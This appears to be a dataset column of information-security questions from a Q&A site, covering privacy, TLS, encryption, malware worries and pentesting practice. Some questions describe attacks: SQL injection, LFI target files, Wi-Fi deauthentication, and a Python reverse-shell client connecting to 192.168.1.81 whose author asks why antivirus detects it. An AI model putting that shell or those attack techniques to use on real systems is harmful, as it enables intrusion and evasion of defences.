instruction
stringlengths
24
29.9k
On July 21 2020 a business was subjected to DDoS attacks crashing their system and causing a very expensive problem. My IP address was used and I am being blamed and have to explain how my IP address was identified as the source of the problem. For what it's worth I have since discovered a lot of malware running on my...
I want to sell my old 4TB Hard Drive. Of course I want no one to steal my data. Overwriting the whole drive with zeros with dd if=/dev/zero of=/dev/sda would take about 18h. But I cannot reboot my PC for 18 hours because I think dd always starts writing at sector 0 so it cannot continue and would start from the beginni...
I'm creating a quantum random number generator as part of my thesis. As part of the research phase, I'm trying to substantiate my aspertion that encryption is significantly weakened if a computer system has poor entropy available to it. However, I can't seem to find any specific attacks that exploit this weakness. Does...
yesterday I accidentally searched up a website and misspelled a character and it took me to an obscene website that I was horrified by on my school laptop. I was also on my school account. Can my school see what I looked up?
My school can track my browsing when I'm at home and using the Google account they gave me, the laptop is my personal one. Is there a way that they could track what I do, even though I'm on my other Google account? My school email has been on my laptop for a year or 2 and I'm just concerned that they could track things...
I've used cleanbrowsing.org as a DNS filter, created an administrator account, logged in into that account, changed my usual (admin) account to a normal user and set the new admin account with a long password that I can't remember (copy paste password). This should be a measure to clean my browsing results and if I'm i...
Background In practicing pentesting a VM on Vulnhub I encountered an issue that is quite interesting with Brainpan. After initial access with a limited shell generated from a BoF exploit on a service running on port 9999, I did some basic enumeration and found the following : sudo -l revealed that the current shell us...
I am getting this error in my device: javax.net.ssl.SSLException: hostname in certificate didn't match: <ec2-5-43-58-857.us-east-2.compute.amazonaws.com> != <na> So I did some research and found I could set alternative IP address in an OpenSSL config and then generate new keys/certs. This is my config [ubuntu@ip-172-3...
SSH certificates are a recent addition to the protocol, and I see them as being used mostly for the clients. Can the server use an SSH certificate too? And if so, is it possible to have mutual SSH authentication between a client and a server, all done via certificates?
I am currently writing a program that sends an encrypted file to the client, and I don't want the user to be able to access the file directly (though the client program will operate on it). Since the client will be written in Java, which is prone to reverse engineering methods like decompilers as well as things like ja...
I had some files that I want to recover from windows, but I formatted the ssd drive to macos (apfs)? Is there a tool or method to recover those files?
I am developing a web app and while testing it on burpsuite I found that it is vulnerable to the proxy SSL certificate. I did some research and found that it was handled by a technique called SSL pinning. But the main problem in front of me is that most of the browsers have deprecated certain kinds of SSL pinning. Plea...
I have an iPhone XR with the latest updates. I use Microsoft Authenticator for some 2 step verification for work related stuff. Today I enabled the Instagram two factor security option and choose the app authentication. This prompted me to download an authenticator by DUO security. So I gave that a try. Once downloaded...
Are you familiar with the Element chat system of https://app.element.io ? Are you familiar with its connections to Matrix.org (for a free account)? Is there a way that I can sniff this traffic on the OS when I hit the enter key on a message so that I can confirm that Google Chrome on Linux only sends this encrypted mes...
I received this email for my hosting: Please see the forwarded e-mail below for more details. Apparently, your server is used for hacking which is strictly forbidden by our ToS. > 167. - [09/Oct/2020:15:37:42 +0200] "GET /wp-login.php HTTP/1.1" 200 10581 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/2010...
It is technically allowed by many programming languages to supply parameters in POST requests as part of the URL, similar to a GET request. You can do this in addition to supplying parameters in the body of the POST request at the same time. I just stumbled upon an application that's using such POST requests containing...
Let's say you have a website https://example.org which is being decommissioned and redirected to https://example.net. Your users have a cookie on https://example.org which contains some authentication token for the backend services (e.g. https://backend.example.org). You want the redirect on https://example.org to also...
I have an interesting question and I really want to get an answer to this. What does my ISP see if I change my DNS server and I use an HTTPS connection? Firstly, when I use my ISP's DNS server: So, I think, when I type a certain URL in my browser (for example https://google.com), I send a request through my ISP to my I...
I have an upcoming exam for a Security course. The following question has come up a couple times in past exams and I could use some help formulating an answer. Suppose a user downloads an unsigned application software (say an email client) from the Internet. If an attacker is able to inject any arbitrary code into the...
When converting the reverse shell client.py python file to exe with pyinstaller it becomes detectable as a trojan on virustotal.com with most antivirus. Here is my client file: import os, socket, subprocess s = socket.socket() host = '192.168.1.81' port = 9999 s.connect((host,port)) while True: data = s.recv(1024...
For Linux, if we want to test local file inclusion we always search for /etc/passwd For old versions of Windows, (e.g. Windows XP) we search for win.ini What file should I search for in later versions of Windows that is readable and always there?
I found that secp384r1 is supported in almost all web browsers and it is considered secure. My question is: Is it okay if i use only secp384r1 and up named groups? Are there any disadvantages considering that the server is only accessible with TLSv1.2 and up so browser support issues are almost non existent?
I need to perform sensitive REST API calls between 2 server applications that I am writing. To do this I need to be able authenticate the server that is performing the sensitive API calls. The current architecture + what I need to add in orange: *All servers are exposed to the internet. What I thought to do is: Limit...
This was for a CTF (it ended yesterday, so I'm not cheating), but I've spent so many hours on it that I really just want to understand what I should have done. Here is the PasteBin Hex Dump. I imported and followed the TCP stream and get a flag, but it's not correct, looking at the packets there are several errors thou...
I have accessed a database and using --is-dba , I know that the user IS NOT database admin and also using --privileges , I know that the privileges is USAGE . Now I want to know is this the reason that sqlmap is only dumping the ID column of the table? current user is DBA: False [12:57:03] [INFO] fetching database user...
You have a User table: UserID (auto-incrementing Integer) Password hash LastLogin All related tables are linked by the UserID. You also have a Username table: Username Salt IncorrectLoginCount LockedUntil etc. A user creates an account. You take the Username + Password and a unique, random salt and hash it all togeth...
Today I have observed very strange scenario which appears to be attempts to hack an account. So first, let me tell the pre-story: I have started to receive 2-factor authentication SMS messages from Google/Microsoft/Facebook/Instagram with similar content (like use 1234 to verify your account, and similar). What is more...
I'm trying to harden a Linux installation on a personal computer - I decided to try both SELinux and AppArmor as a Mandatory Access Control (MAC) to supplement the default Discretionary Access Control (DAC) that Linux comes with by default. However, after having played around with both solutions for a couple of days it...
I am developing a web app and wanted it to be secure from attacks from the application layer. Currently, my website is allowing interception from Burpsuite like certificate proxy software. Is there a way to block requests from frontend whenever we run the website on an insecure certificate? If that is not possible, can...
http://hunger.hu/webgl.html WARNING: only visit this website, it you don't mind crashing your PC! so how is this possible? the website dates back to 2014! It is 2020 and by only visiting a website causes it to crash? backup links for the html page: backup page#1: https://pastebin.com/cjti4FRt backup page#2: https://pas...
I noticed that the default behavior of Tor browser is to use POST method for all DuckDuckGo searches even when that's not the default DuckDuckGo setting. At first I thought it'd be to protect the search query from the exit node believing that TLS doesn't encrypt the HTTP header but, I was wrong. I found that HTTP Heade...
I run my own IMAP server on my own machine, and am the only user of it. The server uses a self-signed certificate that I generated with OpenSSL. I don't use the certificate for any other purpose. I connect to the server only from the local machine, and from my laptop when travelling, and I make sure to validate the ...
I have an SQL injection in a query where I control the sort direction parameter i.e: SELECT * from x where y=y ORDER BY COLUMN_NAME [SORT_DIRECTION] When I control the SORT_DIRECTION, which is normally ASC or DESC, how do I turn this into a blind SQL injection?
When one verifies a certificate that came alongside a signature for some sort of code, is there a standard that specifies what shall be verified? For example, if I'm to verify a certificate that came alongside a SSL response from a server, I can follow RFC-6125. For emails, there is RFC-5750. So I was wondering if ther...
Sometimes given the laws and the circumstances one is subjected to, obtaining an official SSL Certificate for a webservice might be extraordinarily difficult if not illegal. For those who are stuck with having to self-sign their sites, is there anyway of providing my certificate to an out-of-band verification or author...
I'm on Windows 10 last build and for a few days it looks like I have a malware that modifies ethereum addresses in my clipboard. I sadly tried a lot of antivirus, antispyware and nothing is found. I think I have a FUD malware. Is there a tool to catch a process that modifies my clipboard? Maybe any sysinternal tools?
I'm trying to analyze my flutter app's network traffic so I used burp suite for intercepting. First, I'm using the proxy option of burpsuite. I set my PC's IP address and port as 8080. Also in my Android device I set the proxy in WiFi with hostname as my PC IP address and port as 8080. Then I also installed the certifi...
I always wonder about the generic statements about the security of passwords. Isn't it a huge difference if the password is used for an online account or for local data encryption? For example an ebay account or some local ZIP file encryption? Some 8 digit password with upper- and lowercase plus numbers is having an en...
One thing I've had hammered into me by pretty much every security expert I've talked to is that security by obfuscation is not a substitute for actual security measures. However, it has me wondering; are there any valid cases for security by obfuscation, when used in conjunction with other methods of security? Or does ...
During my IT school years, I was told that including rows identifiers from a database in the resource URL, in the context of a REST API, is a bad practice. To my understanding, the rationale behind this statement is that exposing technical database identifiers is a security breach. For instance, say I have a table USER...
I run an instance of a log aggregation product in the cloud, installed on a VM. I've strictly configured it's networking settings, internal firewall, internal port redirection, strong admin password, valid HTTPS certificate, etc. The web interface is publicly open to the web by design and I can't limit the access to it...
Hello i am developing an app that collects some private data from my clients. My clients wont like it if i am able to read the data. So the data is encrypted in cleint side with a key say "xyz",which is auto generated when client install the app/make a account and only with this key can someone read this data. Now when...
The title is pretty self explanatory. The market is pretty secretive about these kinds of matter since companies won't give out vulnerabilities for attackers to abuse and will give out vulnerabilities that are solved and attackers would think the same way, but maybe an unsolved attack was leaked somewhere and I'm inter...
I'm not certain whether WSL 2 instances, running in Hyper-V, are actually scanned by Windows Defender. I have found some articles on Google describing Window Defender's performance impact on WSL, but they are not mentioning whether they are talking about WSL 1 or WSL 2. Indeed, it's possible for Windows Defender to sca...
It's well known that web clients are easy to fingerprint, and you can see that the same is true for other protocols like email and BitTorrent. This begs the question: which protocols aren't easy to fingerprint? Specifically, protocols possessing multiple client implementations (e.g. not freenet) that support upload and...
I'm working on security assessment of thick client application created using ULC. It is black box approach. Based on wiki (wiki.c2.com): "Ultra Light Client (ULC) for Java is a widget set that enables a Swing Look and Feel for Servlets". What I would like to do is to use SQLMap to test backend database. Intercepted tra...
Are smart plugs safe, Xiaomi ones in particular (Zigbee and WI-FI versions)? My main concern is that the plug is connected to Mi account and allows remote management. In case hacker gains access, can he reboot it dozens of times per second, so that would lead to spark, shortage and ultimately cause fire? Should I be c...
Today I was on Steam and someone sent me a link and asked me to vote for him in some online gaming league. I clicked on it and the browser told me that this could be an unsafe link so I didn't proceed further. Then I opened in another browser to see if it was a legit site. I see that this was a domain registered today ...
As far as I understand they do pretty much the same.
First off, I know very little about cryptography, as I am sure my post below makes clear. The short version is I presume I need to use the -o (offset) function of pkcrack, but I'm not sure how to work out what offset I need. I have an old .wmv file (around 65MB) that I encrypted in a zip file about 11 years ago, and I'...
Say I have a private key as a user of an existing application for SSH, password management, etc. As far as I know if it is in shared storage, any application with storage permissions can access it. If the application that requires such a key doesn't save it to it's application storage, is there any way to securely stor...
The conventional wisdom is that when you store data for long-term storage, you convert the data into a format that will last for decades. It should be in NTFS or FAT and the file format should be one in which will be around for decades. For example, they do not recommend that files should be left in docx (Word format)...
Suppose Alice and Bob are communicating using a peer-reviewed symmetric encryption algorithm such as AES-256. Bob possesses a private encryption key to decode messages from Alice, but Alice does not have this key. If Alice has plain text ready to encrypt and send to Bob, is it computationally feasible for Alice to prod...
I am wondering if there is any additional security increase by choosing to run your webserver on an internal private ip address and port like xyz.ab.cd.efg:8080 versus localhost:8080 or 127.0.0.1:8080 If so, what does this mitigate against? For this scenario lets assume that your webserver is serving some site example....
I am using AWS KMS as a vault for my encryption key. Now what I am doing is that I am creating one data key, encrypt it using Customer Managed CMKs. Now on every request, I just call AWS KMS Service to decrypt the data key and from the data key, I encrypt/decrypt the data. I am using this to encrypt/decrypt the databas...
I was talking to PayPal customer service and they were trying to tell me PayPal does not have any third parties, so when I shown them https://www.paypal.com/uk/webapps/mpp/ua/third-parties-list they responded to me that this is not a real paypal site, despite https://www.paypal.com/uk/home being the website for PayPal....
The following question belongs more to the HP forums but unfortunately I am not gaining any traction there. Please move the question to another SE if its off topic for this community. Recently I've started receiving the following BIOS interruption & message at each boot: "HP Sure Start detected an unauthorized change ...
I want to provide a way for my users to download their data, which are stored in S3, through my app. Should I provide them with a public url followed by a key random key, as in this example? http://s3.amazonaws.com/user-xyz123/folder/some_csv_file.csv It could be possible for an attacker to brute-force the url, so can ...
There's this game at http://slither.io which I like to play. Only inputs that I give to it are space bar, and cursor location. It's not https. Are there any risks?
Found a bug in a function in a loop where I can go past a loop in assignment where value is read from past malloced memory The function has no call, int or other assembly instructions afterwards. Instruction I control is movzbl. I control the source registry value. Pseudocode in C: For(...) { ptr=array[i] <---- here i...
I am building a web app, which is made of a Node.js Backend and Angular (NOT AngularJS!!! I only used the tag, because Angular was not available..) Frontend. How do I properly secure this app? I already have an idea to use JWT tokens (I already implemented this) with a set expiration date, which will be way longer than...
I have seen and read several videos and articles that try to explain how Zero Knowledge Proof systems work. In these examples, there is a verifier of information, and a prover of information. The verifier asks the prover to prove that they know some information. Metaphors I have seen usually are: The prover wants to p...
as far as my understanding goes, an OS needs to implement some sort of reference monitor, as the entity which grants or denies permissions as an access control decision. Furthermore, I think the Linux kernel does this by providing Linux Security Modules (LSM) or more precisely "hooks", which enable arbitrary "reference...
It seems to me that one of the major flaws of Wifi is that computers will auto-reconnect to a Wifi that merely has the same name as one you connected to in the past i.e. an evil twin. While perusing log files I've seen this happen and it is a surprising design flaw. There ought to be something more substantial than jus...
A friend of mine gave me a web application for me to test and find vulnerabilities. He told me that this web application can be purposefully modified and then made to run an SQL injection. I have been trying everything, but I have not been able to gain access to information. He told me that I should be able to obtain ...
I was big fan of the Toontown Online MMO when Disney used to run it so I was excited to learn that it had been revived by a fan or group for fans building on the original source code. During a recent update, my virus checker said there were questions about the new installer executable, and that they were looking into i...
I'm scanning a machine that has the UDP port 161 open and I'm not able to run snmpwalk against it as I'm returned with the error: Timeout: No Response from <IP> I tried to run the onesixtyone tool to bruteforce the community string with different wordlists, but with no success. Is there something else that could be do...
Suppose I have a table with email is stored in one table. I have encrypted it using AES-256 and stored the result in DB Column. For let's say I have one input email and I want to search whether this email exists in DB or not: Now I see two approaches to it Encrypt the input and search for the encrypted value. Use the ...
WCAG is a set of standard web accessibility criteria developed by the W3C that have been adopted by regulatory agencies in a number of countries, including Section 508 in the U.S., which makes compliance mandatory for all government websites. The current working draft of WCAG 2.2 introduces a new success criterion, 3.3...
As of Thunderbird 78, the support for PGP plugins such as Enigmail has been dropped in favour of a native implementation of pgp in Thunderbird's core. But some features of Enigmail are still missing. One of those features is to create something akin to Enigmail's per-recipent rules.[1] This makes it impossible for peop...
i would like to know if i encrypt a proxy server communication with TLS v1.3 is it still possible for a firewall censor to a deep packet scanning to decrypt. Also, what can be done to make the encrypted proxy more secure?
An application has a file extension validation at the server side and rejecting the request if the Extensions are not matching to (.pdf/.docx). But if i modify an exe file's extension to .pdf and upload it, its processing the request. Is this a security vulnerability?? If so, how an attacker can take advantage of? PS: ...
i would like to know what can be added to make a proxy server using TLS encryption more secure so that it can bypass censors that are using quantum computational power?
Is normal that a web site which uses OpenID as SSO sends all the cookie without samesite header? Is this required in order to make OpenID work correctly?
What does "cybersecurity landscape" mean? Is it a cyber threat trend?
I can see encryption details and AUTH types with ifconfig but not airmon-ng. Do I need to do something about it in order to to get better results from Fake authentication attack ARP request attack Deauthentication attack I couldn't change wlan0 to wlan0mon either, but I used ifconfig instead, and I could manage to d...
I have been talking backwards and forwards with a MalwareByte support, because every time I run 'quarantine threats' all my Chrome tabs crash. This guy keeps asking me to switch Google sync off, and then resetting it, except that there is no reset sync button anywhere. Most of all, he won't answer my question: do I rea...
Say I have two peers that wish to engage in a protocol with multiple sub-protocols. Naturally, it is necessary for them to negotiate which sub-protocol they should use. But what if the peers wish to be anonymous? How can they agree on which sub-protocol to use without fingerprinting themselves with the list that their ...
If a laptop has Computrace/Absolute software installed and I host a VM there, would the Computrace/Absolute software be able to track whatever they track on the VM?
Is it possible to 'view' the space that TRIM would take care of to see if that space was really wiped? I am using both Windows and Linux.
I want to add one-time passwords as gates for certain important actions in the application I am working on. It is not two-factor authentication, although it may be extended to that use case later. RFC6238 is a very commonly adopted standard for this kind of problem. It seems very straight-forward to have users download...
My company is currently developing a product which consists of a fairly generic PC hardware platform and a software stack (the software stack is based on a Debian Buster Linux OS + some applications we develop). As most of the value of our product is the software, we would like to make sure that our software won't run ...
Today, clicking on links (via Chrome from my Google home page), I started seeing "https://beinternetawesome.withgoogle.com/en_us/" come up instead of the site I had attempted to load. I'm trying to determine if this is due to typical/traditional malware, or a bug at Google, or simply an inappropriate decision by Google...
Are there benefits to set an expiration date on a PGP primary key which is only used offline? Is setting an expiration date only on the subkeys enough?
Is there a security difference between doing sudo make install versus two step sudo su and then typing make install The reason I'm asking is because a security requirement to install some software says you must type exactly 'make install' (not sudo make install) - presumably for some permission reasons. However, the...
When I try to download SandBoxie in the 64-bit version, at this link: SandBoxie and I analyze it with VirusTotal, it tells me that it's safe, but when I analyze some relative files, called: 066cca997f12a387f6ea0459e7a2f9a8cf7e842236fa624ef658b5a85571a860 sandbox.exe SandboxieInstall SandboxieInstall-533-3.exe s.ex...
HTTP I'm aware that HTTP sends plain text over the network which can be sniffed and modified if a MITM is performed. HTTPS On the other hand, HTTPS sends encrypted text over the network that can neither be sniffed nor modified. Other? I'm wondering if there is an in between where the traffic can be sniffed, but not mod...
I'm a systems specialist in our organization and I've read a lot about TeamViewer security concerns over the last few years. Now I decided to come seek professional and objective opinions about the security of the following scenario: TeamViewer Corporate license TeamViewer account with a complex password and 2FA enabl...
For PII, we have to encrypt some columns in our DB (All of our infra resides on our own DC, not using any cloud provider). Now roughly what we are doing is Created a CMK at AWS. Generate Data Key using CMK Store the encrypted key in DB For every request, we decrypt the encrypted data key via AWS and got the plaintext ...
I have recently picked up the oauth2 spec and decided to use keycloak as an auth server. I am facing difficulties in a certain aspect. I want to be able to request multiple access tokens with narrow scope when a user is first authenticated or whenever one of those narrowed tokens expires. This is due to the fact that i...
I'm currently honing in on my web exploitation skills and came across this JavaScript function here: Event.observe(window, 'load', function() { new Ajax.Request('/dir/dir', { method: 'post', parameters: 'action\x3DrefreshAjaxModule\x26amp\x3BmodId\x3D_1895_1\x26amp\x3BgroupId\x3D_1_1\x26amp\x3Bgroup_id...
From 2020.09.01 Google, Apple an Mozilla changed the maximum trust time to 398 days. I'm working on a project, where the client also authenticates itself with a certificate. This certificate is stored in the browser. So does this change affect the lifetime of the client certificate, or only the server side? Can my priv...
I'm wondering if I'm risking anything if I use style-src-attr 'unsafe-hashes' <hash> in my CSP header. I need to allow an external script to run, and it uses the style attribute on some elements. I have no control over the external script, and if there is a malicious person behind it, what might an attack vector be? (...
I get that what comprises a good password is a bit of a moving target and not everyone agrees - just run a password through a number of checkers to see how it is rated differently depending on the criteria. But a couple of things seem like safe bets and are widely acknowledged - length (as a method of achieving entropy...
A few years ago, I left a new laptop at a sketchy computer shop to downgrade the OS to Windows 7. The experience was a disaster. My goal now is to install Cinnamon Linux on the laptop and remove Windows entirely. I put the Kaspersky .iso on a blank disk and ran it from the boot menu (I believe this is called a rootkit...
I'm designing an API, and had some quick questions about HTTP authentication and security. The API will involve two web servers, one of which I am the developer of (let's call it Server 1). The server that I am interested to retrieve data from, unfortunately, is one I do not have control over (Server 2). In order to re...
What does this "sign only locally" check box do or mean in gpa (the GNU Privacy Assistant)? I'm working on verifying the fingerprints of acquired public keys, and once verified with their owner, then self signing these keys to signify that I've checked their authenticity.
Let's say the OS is Windows or Linux As a System Admin, I think the answer to this question is : NO I always configure end users machine for auto lockout for a given idle session time. Because I'm think, if the user leaves the machine without locking it, I should try something to at least protect my network What if I d...
DNS over HTTPS aims to increase user privacy and security by preventing eavesdropping and manipulation of DNS data using the HTTPS protocol to encrypt the data between the client and the DoH based DNS resolver. source If a client uses DoH and connects a web site, can ISP see that which site the client visit and has t...
I was recently working on Broken link Hijacking and found a link in a target which reflected on multiple pages. It was portal.REDACTED.local which was not accessible and returned response as bad host. So I never saw a extension that has .local so I just want to know if there is any way to claim this extension. If yes c...